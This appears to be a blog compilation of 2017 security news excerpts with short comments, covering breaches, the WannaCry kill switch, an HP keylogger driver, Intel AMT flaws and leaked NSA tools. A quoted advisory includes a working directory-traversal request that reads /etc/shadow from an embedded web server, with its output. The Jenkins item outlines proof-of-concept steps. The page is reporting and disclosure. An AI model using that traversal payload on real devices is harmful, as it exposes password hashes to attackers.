Millions of people risk having their devices and systems compromised by malicious subtitles, Check Point researchers revealed today. The threat comes from a previously undocumented vulnerability which affects users of popular streaming software, including Kodi, Popcorn-Time, and VLC. Developers of the applications have already applied fixes or will do so soon.
[…]
By conducting attacks through subtitles, hackers can take complete control over any device running them. From this point on, the attacker can do whatever he wants with the victim’s machine, whether it is a PC, a smart TV, or a mobile device,

Source: Malicious Subtitles Threaten Kodi, VLC and Popcorn Time Users, Researchers Warn – TorrentFreak

Processes launched under a lightdm guest session are not confined by the /usr/lib/lightdm/lightdm-guest-session AppArmor profile in Ubuntu 16.10, Ubuntu 17.04, and Ubuntu Artful (current dev release). The processes are unconfined.

The simple test case is to log into a guest session, launch a terminal with ctrl-alt-t, and run the following command:

$ cat /proc/self/attr/current

Expected output, as seen in Ubuntu 16.04 LTS, is:

/usr/lib/lightdm/lightdm-guest-session (enforce)

Running the command inside of an Ubuntu 16.10 and newer guest session results in:

unconfined

Source: Bug #1663157 “Guest session processes are not confined in 16.10 …” : Bugs : lightdm package : Ubuntu

At least tens of thousands, if not millions of medical records of New York patients were until recently readily accessible online to just about anyone who knew how to look.

Patient demographic information, social security numbers, records of medical diagnoses and treatments, along with a plethora of other highly-sensitive records were left completely undefended by a medical IT company based in Louisville, Kentucky. The files, which belong to at least tens of thousands of patients, originate from Bronx-Lebanon Hospital Center in New York.

In a statement provided to Gizmodo—and published by NBC News Wednesday night—Bronx Lebanon said that a server containing its patients’ data had been the “target of an unauthorized hack by a third party,” attributing that assessment to the hospital’s vendor, iHealth Solutions. The hospital added that iHealth had taken immediate steps to protect the data, and that both parties were “cooperating fully with law enforcement agents.” iHealth Solutions did not respond to request for comment.

However, according to Kromtech Security Center, a German security software development firm, the leak was not the result of a malicious hacker infiltrating the Bronx Lebanon server. Instead, the firm’s analysis showed that the data was left unprotected on a backup storage device, without a password, accessible to anyone online. It also appears likely that the data was not protected by an active firewall, exposing an untold number of patients to crimes such identity theft and blackmail.
[…]
In March, Kromtech reported that more than 400,000 audio recordings of telemarketing calls had been exposed online, including many in which customers provided sensitive information, such as credit card details. A month before, the researchers helped secure the personal data of nearly 25,000 California sheet metal workers. Before that, it was a Missouri sheriff’s office, which had inadvertently leaked audio recordings of police informants of victims involved in crimes as serious as child molestation.

Source: Huge Trove of Confidential Medical Records Discovered on Unsecured Server Accessible to Anyone

Secure rsync, people!

“An ‘accidental hero’ has halted the global spread of the WannaCry ransomware that has wreaked havoc on organizations…” writes The Guardian. An anonymous reader quotes their report:
A cybersecurity researcher tweeting as @malwaretechblog, with the help of Darien Huss from security firm Proofpoint, found and implemented a “kill switch” in the malicious software that was based on a cyber-weapon stolen from the NSA. The kill switch was hardcoded into the malware in case the creator wanted to stop it from spreading. This involved a very long nonsensical domain name that the malware makes a request to — just as if it was looking up any website — and if the request comes back and shows that the domain is live, the kill switch takes effect and the malware stops spreading. Of course, this relies on the creator of the malware registering the specific domain. In this case, the creator failed to do this. And @malwaretechblog did early Friday morning (Pacific Time), stopping the rapid proliferation of the ransomware.

You can read their first-person account of the discovery here, which insists that registering the domain “was not a whim. My job is to look for ways we can track and potentially stop botnets…” Friday they also tweeted a map from the New York Times showing that registering that domain provided more time for U.S. sites to patch their systems. And Friday night they added “IP addresses from our [DNS] sinkhole have been sent to FBI and ShadowServer so affected organizations should get a notification soon. Patch ASAP.”

UPDATE: Slashdot reader Lauren Weinstein says some antivirus services (and firewalls incorporating their rules) are mistakenly blocking that site as a ‘bad domain’, which allows the malware to continue spreading. “Your systems MUST be able to access the domain above if this malware blocking trigger is to be effective, according to the current reports that I’m receiving!”

slashdot

The audio driver installed on some HP laptops includes a feature that could best be described as a keylogger, which records all the user’s keystrokes and saves the information to a local file, accessible to anyone or any third-party software or malware that knows where to look.

Swiss cyber-security firm modzero discovered the keylogger on April 28 and made its findings public today.
Keylogger found in preinstalled audio driver

According to researchers, the keylogger feature was discovered in the Conexant HD Audio Driver Package version 1.0.0.46 and earlier.

This is an audio driver that is preinstalled on HP laptops. One of the files of this audio driver is MicTray64.exe (C:\windows\system32\mictray64.exe).

This file is registered to start via a Scheduled Task every time the user logs into his computer. According to modzero researchers, the file “monitors all keystrokes made by the user to capture and react to functions such as microphone mute/unmute keys/hotkeys.”

This behavior, by itself, is not a problem, as many other apps work this way. The problem is that this file writes all keystrokes to a local file at:

C:\users\public\MicTray.log

Audio driver also exposes keystrokes in real-time via local API

If the file doesn’t exist or a registry key containing this file’s path does not exist or was corrupted, the audio driver will pass all keystrokes to a local API, named the OutputDebugString API.

Source: Keylogger Found in Audio Driver of HP Laptops

“Non tech savvy users will have issues reporting or getting the problem fixed,” he explained. “To regain web access you have to disable Web Shield or disable Avast or uninstall Avast. To fix the issue you have to do a clean install of the latest version of software.”

It’s unclear how widespread the problem is. Avast’s PR reps have acknowledged our requests for comment but are yet to supply a substantive response.

All HTTP requests are blocked from all applications including Windows Update. “TCP connections are established but no HTTP request is sent,” according to Michael S.

Source: Avast blocks the entire internet – again

Emmanuel Macron’s digital team responded to cyberattacks with a “cyber-blurring” strategy that involved fake email accounts loaded with false documents.
[…]
“We created false accounts, with false content, as traps. We did this massively, to create the obligation for them to verify, to determine whether it was a real account,” Mr. Mahjoubi said. “I don’t think we prevented them. We just slowed them down,” he said. “Even if it made them lose one minute, we’re happy,” he said.
[…]
But he did note that in the mishmash that constituted the Friday dump, there were some authentic documents, some phony documents of the hackers’ own manufacture, some stolen documents from various companies, and some false emails created by the campaign.

Source: Hackers Came, but the French Were Prepared

What this does – which is more important – is it puts the onus on the leakers / hackers to verify the contents of their data, which is a big deal, as this is hard to do and time consuming. As soon as any doubt is seeded on the authenticity on even one of the documents in a leaked trove, the whole of the trove massively loses value.

TITSUP: Total Inability To Stand Up Products

Loads of people reported that, at around 1245 PT, access to the service went out. Microsoft confirmed shortly after it was having problems, and said it was looking into the matter. Subscribers in New York, Denver, Texas, and Portland, in the US, were, for example, unable to access the service.

We are investigating a problem affecting access to Office 365, and we will post an update as soon as we have more info.
— Office 365 Status (@Office365Status) May 10, 2017

Monitoring site Downdetector was crammed with reports of outages from both coasts of the US and major cities as users reported the cloud-connected Office service to be inaccessible.
[…]
we notice they tweeted that as of 1338 PT, sign-in issues are being resolved

Source: Well this is awkward. As Microsoft was bragging about Office at Build, Office 365 went down

The problem with the Cloud

Malware has infected backend systems used by Brit high street chain Debenhams – and swiped 26,000 people’s personal information in the process.

The cyber-break-in targeted the online portal for the retailer’s florist arm, Debenhams Flowers. Miscreants had access to the internal systems at Ecomnova, the biz that runs the Debenhams Flowers business, for more than six weeks.

Customer payment details, names and addresses from between February 24 and April 11 were all potentially exposed as a result of the breach, reports ex-Register vulture Alex J Martin, who just flew off to Sky News. Affected customers have all reportedly been notified.

El Reg asked Debenhams for confirmation of the scope of the breach but we’re yet to hear back at the time of writing.

Security tech slingers said the snafu shows how brands can be exposed through the infosec shortcomings of third-party suppliers.

“The hackers allegedly gained access to site operator Economova’s systems using malicious software to access customers’ personal and financial information,” said Dr Jamie Graves, chief exec at ZoneFox. “The Debenhams hack is a key reminder to businesses that the third-party vendors you partner should be properly vetted to ensure they have secure systems in place.”

Source: Debenhams Flowers shoppers stung by bank card-stealing tech pest

A remote hijacking flaw that lurked in Intel chips for seven years was more severe than many people imagined, because it allowed hackers to remotely gain administrative control over huge fleets of computers without entering a password. This is according to technical analyses published Friday… AMT makes it possible to log into a computer and exercise the same control enjoyed by administrators with physical access [and] was set up to require a password before it could be remotely accessed over a Web browser interface. But, remarkably, that authentication mechanism can be bypassed by entering any text string — or no text at all…

“Authentication still worked” even when the wrong hash was entered, Tenable Director of Reverse Engineering Carlos Perez wrote. “We had discovered a complete bypass of the authentication scheme.” A separate technical analysis from Embedi, the security firm Intel credited with first disclosing the vulnerability, arrived at the same conclusion… Making matters worse, unauthorized accesses typically aren’t logged by the PC because AMT has direct access to the computer’s network hardware… The packets bypass the OS completely.

Slashdot

WikiLeaks isn’t done exposing the CIA’s arsenal of hacking tools used to infiltrate computer systems around the globe. Last month, we told you about Weeping Angel, which targeted select Samsung Smart TVs for surveillance purposes. Today, we’re learning about Archimedes, which attacks computers attached to a Local Area Network (LAN).

Although we have no way of knowing whether Archimedes is still in use by the CIA, the details of how it is unleashed on unsuspecting parties has been revealed in full. In its teaser announcing the exploit, WikiLeaks writes, “It allows the re-directing of traffic from the target computer inside the LAN through a computer infected with this malware and controlled by the CIA.
[…]
Fulcrum uses ARP spoofing to get in the middle of the target machine and the default gateway on the LAN so that it can monitor all traffic leaving the target machine. It is important to note that Fulcrum only establishes itself in the middle on one side of the two­-way communication channel between the target machine and the default gateway. Once Fulcrum is in the middle, it forwards all requests from the target machine to the real gateway.

Archimedes can be deployed on machines running Windows XP (32-bit), Windows Vista (64-bit) and Windows 7 (64-bit) operating systems. The CIA documentation also says that the binaries required for Archimedes/Fulcrum will “run on any reasonably modern x86-compatible hardware”.

Source: WikiLeaks Reveals CIA Man-in-the-Middle LAN Hacking Tool Archimedes

Experts have been warning for years about security blunders in the Signaling System 7 protocol – the magic glue used by cellphone networks to communicate with each other.

These shortcomings can be potentially abused to, for example, redirect people’s calls and text messages to miscreants’ devices. Now we’ve seen the first case of crooks exploiting the design flaws to line their pockets with victims’ cash.

O2-Telefonica in Germany has confirmed to Süddeutsche Zeitung that some of its customers have had their bank accounts drained using a two-stage attack that exploits SS7.

In other words, thieves exploited SS7 to intercept two-factor authentication codes sent to online banking customers, allowing them to empty their accounts. The thefts occurred over the past few months, according to multiple sources.

Source: After years of warnings, mobile network hackers exploit SS7 flaws to drain bank accounts

A US online pet store has exposed the details of more than 110,400 credit cards used to make purchases through its website, researchers have found.

In a stunning show of poor security, the Austin, Texas-based company FuturePets.com exposed its entire customer database, including names, postal and email addresses, phone numbers, credit card information, and plain-text passwords
[…]
The database was exposed because of the company’s own insecure server and use of “rsync,” a common protocol used for synchronizing copies of files between two different computers, which wasn’t protected with a password.

Source: A database of thousands of credit cards was left exposed for months

Oh dear, clear text passwords and non-protected rsync transfers 🙁

Bruce66423 brings word that a terrorist’s WhatsApp message has been decrypted “using techniques that ‘cannot be disclosed for security reasons’, though ‘sources said they now have the technical expertise to repeat the process in future.'” The Economic Times reports:
U.K. security services have managed to decode the last message sent out by Khalid Masood before he rammed his high-speed car into pedestrians on Westminster Bridge and stabbed to death a police officer at the gates of Parliament on March 22. The access to Masood’s message was achieved by what has been described by security sources as a use of “human and technical intelligence”…

Slasdot

On Wednesday, large chunks of network traffic belonging to MasterCard, Visa, and more than two dozen other financial services companies were briefly routed through a Russian government-controlled telecom under unexplained circumstances that renew lingering questions about the trust and reliability of some of the most sensitive Internet communications.

Anomalies in the border gateway protocol—which routes large-scale amounts of traffic among Internet backbones, ISPs, and other large networks—are common and usually the result of human error. While it’s possible Wednesday’s five- to seven-minute hijack of 36 large network blocks may also have been inadvertent, the high concentration of technology and financial services companies affected made the incident “curious” to engineers at network monitoring service BGPmon. What’s more, the way some of the affected networks were redirected indicated their underlying prefixes had been manually inserted into BGP tables, most likely by someone at Rostelecom, the Russian government-controlled telecom that improperly announced ownership of the blocks.
“Quite suspicious”

“I would classify this as quite suspicious,” Doug Madory, director of Internet analysis at network management firm Dyn, told Ars. “Typically accidental leaks appear more voluminous and indiscriminate. This would appear to be targeted to financial institutions. A typical cause of these errors [is] in some sort of internal traffic engineering, but it would seem strange that someone would limit their traffic engineering to mostly financial networks.”

Source: Russian-controlled telecom hijacks financial services’ Internet traffic

The bug, CVE-2017-1000353, exists in how Jenkins implements HTTP upload/download requests.

The bug lets an attacker exploit a serialised object in the preamble of commands sent to the CLI. As described by Securiteam, “since Jenkins does not validate the serialised object, any serialise[d] object can be sent.”

The attacker can use the channel to send SignedObject to the CLI. Jenkins deserialises it using a new ObjectInputStream, which the company says bypasses its blacklist-based protection mechanism.

To block it, Cloudbees has added SignedObject to its blacklist.

To test the vulnerability for yourself, the bug report suggests the following:

Create a serialised object whose payload is a command executed by running the payload.jar script;
Change the Python script jenkins_poc1.py to adjust the target target URL, and open your payload file.

Source: Jenkins admin? Get buzzy patching, says Cloudbees

The short version is that every Intel platform with AMT, ISM, and SBT from Nehalem in 2008 to Kaby Lake in 2017 has a remotely exploitable security hole in the ME (Management Engine) not CPU firmware. If this isn’t scary enough news, even if your machine doesn’t have SMT, ISM, or SBT provisioned, it is still vulnerable, just not over the network. For the moment. From what SemiAccurate gathers, there is literally no Intel box made in the last 9+ years that isn’t at risk. This is somewhere between nightmarish and apocalyptic.

First a little bit of background. SemiAccurate has known about this vulnerability for literally years now, it came up in research we were doing on hardware backdoors over five years ago. What we found was scary on a level that literally kept us up at night. For obvious reasons we couldn’t publish what we found out but we took every opportunity to beg anyone who could even tangentially influence the right people to do something about this security problem. SemiAccurate explained the problem to literally dozens of “right people” to seemingly no avail. We also strongly hinted that it existed at every chance we had.

Various Intel representatives over the years took my words seriously, told me I was crazy, denied that the problem could exist, and even gave SemiAccurate rather farcical technical reasons why their position wasn’t wrong. Or dangerous. In return we smiled politely, argued technically, and sometimes, usually actually, were not so polite about our viewpoint. Unfortunately it all seems to have been for naught.

The problem is quite simple, the ME controls the network ports and has DMA access to the system. It can arbitrarily read and write to any memory or storage on the system, can bypass disk encryption once it is unlocked (and possibly if it has not, SemiAccurate hasn’t been able to 100% verify this capability yet), read and write to the screen, and do all of this completely unlogged. Due to the network access abilities, it can also send whatever it finds out to wherever it wants, encrypted or not.

Source: Remote security exploit in all 2008+ Intel platforms – SemiAccurate

Oh shit.

You can download a detector here from Intel

Neatgear has cocked up its cloud management service, losing data stored locally on ReadyNAS devices’ shared folders worldwide – and customers have complained to The Register about only being informed four weeks later.

This week, the San Jose-based networking business sent an email to customers, seen by The Register, confirming that an “outage” affecting ReadyCLOUD, the free service for its network attached storage offering, caused the storage systems to disconnect from the cloud service and be marked as deleted at the end of March.

Compounding the issue, as part of a clean-up process, Netgear decided that when a ReadyCloud account is marked as closed, the NAS holding that account’s home folder should be deleted along with all of the data it was holding.

As one user complained to The Register: “In practice, accounts are generally deleted from the NAS admin screen by the user and a big warning flashes up to tell you that all data will be deleted. In this case, as the glitch was server side, no warning was presented and loads of people found that their home folders and data had mysteriously been deleted, by the looks of it, at the command of Netgear.”

Source: Netgear says sorry four weeks after losing customer backups

The Shadow Brokers have leaked more hacking tools stolen from the NSA’s Equation Group – this time four-year-old exploits that attempt to hijack venerable Windows systems, from Windows 2000 up to Server 2012 and Windows 7 and 8.

The toolkit puts into anyone’s hands – from moronic script kiddies to hardened crims – highly classified nation-state-level weaponry that can potentially compromise and commandeer systems around the world. This is the same powerful toolkit Uncle Sam used once upon a time to hack into and secretly snoop on foreign governments, telcos, banks, and other organizations.

The files range from Microsoft Windows exploits to tools for monitoring SWIFT interbank payments. Ongoing analysis of the leaked documents and executables has revealed Cisco firewalls and VPN gateways are also targets.

Source: Leaked NSA point-and-pwn hack tools menace Win2k to Windows 8

These are actually useful and working tools, as opposed to the last lot.

Cyber experts at Newcastle University, UK, have revealed the ease with which malicious websites, as well as installed apps, can spy on us using just the information from the motion sensors in our mobile phones.

Analysing the movement of the device as we type in information, they have shown it is possible to crack four-digit PINs with a 70% accuracy on the first guess – 100% by the fifth guess – using just the data collected via the phone’s numerous internal sensors.
[…]
“Most smart phones, tablets, and other wearables are now equipped with a multitude of sensors, from the well-known GPS, camera and microphone to instruments such as the gyroscope, proximity, NFC, and rotation sensors and accelerometer.

“But because mobile apps and websites don’t need to ask permission to access most of them, malicious programs can covertly ‘listen in’ on your sensor data and use it to discover a wide range of sensitive information about you such as phone call timing, physical activities and even your touch actions, PINs and passwords.

“More worrying, on some browsers, we found that if you open a page on your phone or tablet which hosts one of these malicious code and then open, for example, your online banking account without closing the previous tab, then they can spy on every personal detail you enter.

“And worse still, in some cases, unless you close them down completely, they can even spy on you when your phone is locked.

“Despite the very real risks, when we asked people which sensors they were most concerned about we found a direct correlation between perceived risk and understanding. So people were far more concerned about the camera and GPS than they were about the silent sensors.”

Source: Are your sensors spying on you?

A security researcher has found 40 unknown zero-day vulnerabilities in Tizen, the operating system that runs on millions of Samsung products.

Source: Samsung’s Android Replacement Is a Hacker’s Dream – Motherboard

The vulnerability is due to the existence of default credentials for an affected device that is running Cisco Mobility Express Software, regardless of whether the device is configured as a master, subordinate, or standalone access point. An attacker who has layer 3 connectivity to an affected device could use Secure Shell (SSH) to log in to the device with elevated privileges. A successful exploit could allow the attacker to take complete control of the device.

cisco advisory

Details:
========
The corresponding embeded webserver “PST10 WebServer” typically listens
to port 80 and is prone to a directory traversal attack, therefore an
unauthenticated attacker may be able to exploit this issue to access
sensitive information to aide in subsequent attacks.

Proof of Concept:
=================
~$ telnet 192.168.0.1 80
Trying 192.168.0.1…
Connected to 192.168.0.1.
Escape character ist ‘^]’.
GET /../../../../../../../../../../../../etc/shadow HTTP/1.1

HTTP/1.1 200 OK
Date: Wed, 16 Nov 2016 11:58:50 GMT
Server: PST10 WebServer
Content-Type: application/octet-stream
Last-Modified: Fri, 22 Feb 2013 10:04:40 GMT
Content-disposition: attachment; filename=”./etc/shadow”
Accept-Ranges: bytes
Content-Length: 52

root:$1$$Md0i[…snip…]Z001:10933:0:99999:7:::

Fix:
====
We are not aware of an actual fix.

Full disclosure

Why would anyone want a webserver on their dishwasher?!

The UK government has announced a cabin baggage ban on laptops and tablets on direct flights to the UK from Turkey, Lebanon, Jordan, Egypt, Tunisia and Saudi Arabia.

The ban follows a similar move in the US, where officials say bombs could be hidden in a series of devices.

Downing Street said it was “necessary, effective and proportionate”.

The government has not given a start-date for the ban, but says airlines are “in the process of implementing it”.

The ban applies to any device larger than 16cm long, 9.3cm wide or 1.5cm deep. It includes smart phones, but most fall inside these limits.

Any affected device, including e-readers, will need to be placed into hold luggage.

Source: UK flight ban on electronic devices announced – BBC News

This looks like a bit of the government being “Seen to do Somethig(tm)” even if that something is incredibly useless and hinders passengers, like the ban on liquids. It also looks very much like the UK is in the pocket of the US, which looks worse now that it’s being run by wealth raping clowns.